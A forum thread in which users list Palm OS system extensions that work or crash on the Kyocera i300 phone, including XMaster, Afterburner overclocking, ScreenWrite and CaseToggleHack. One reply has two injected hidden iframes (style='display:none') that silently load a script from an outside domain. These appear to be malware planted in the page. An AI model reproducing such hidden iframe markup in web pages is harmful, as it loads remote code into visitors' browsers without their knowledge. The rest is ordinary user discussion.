+ Reply to Thread

Hacks That Work on the I300

I've checked out some Palm hacks on the I-300. These work:

XMaster 1.3
    McPhling
    Drag and Drop
    Multiclip

Afterburner - don't even try it! It'll hard crash.

Anyone care to add to the list?

Add these hacks to the list:

PopUpNote
    EasyLaunch

art

hacks

what do these hacks do?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

screenwrite
    techsounds

they both worked on my I300 for a few days. the techsounds got annoying after a while...i couldnt customize it as much as I wanted to. screenwrite is great...i left it on there just in case. however, it messes up the phone app slightly...if you accidentaly tap anywhere there isnt a button, it thinks you're tapping something. nothing major at all...

I've been using silencehack without problems.

CaseToggleHack

it works - it lets you change the case of letters typed. The coolest thing is tapping at the end of a word then tapping again at the beginning of a word changes the case of the first letter. Tapping at the beginning of a word then at the end of the word makes all the letters match the case of the first letter.

-Seth

With the recent talk about the PDAapps and their I300VibraBlinkHack, I thought this old thread could be revived… I also found a quite useful addition in the NetSelect hack. This hack makes it a lot easier to switch between multiple ISP’s. I use three different network connections quite a bit (Sprint, Earthlink and the network at work), and hated going to preferences each time I needed to dial one or the other. Anyway, I have it installed with Xmaster and have had no problems on the i300. You can search for it at PalmGear. I think it can even be installed as a regular app.

I am using the Afterburner ver. 3.10 hack with X-Master ver. 1.4.

There are a few problems that I have encountered, but for the most part it works quite well. As many probably know Afterburner will overclock the processor of unit. I currently am running at 48 MHz, with the default being 33 MHz. The only problem I find is that occasionly I must disable Afterburner to allow for beaming between handhelds, for me not a big inconvenience.

I had major problems with Sceenwrite. Couldn't get it to work at all! Also tried TealEcho a similar type hack which I used on my PalmIIIc. For those unfamiliar with the hack it echos or draws ones graffiti strokes on the screen, I found it very useful and miss it on the i300. It interfered with the phone function.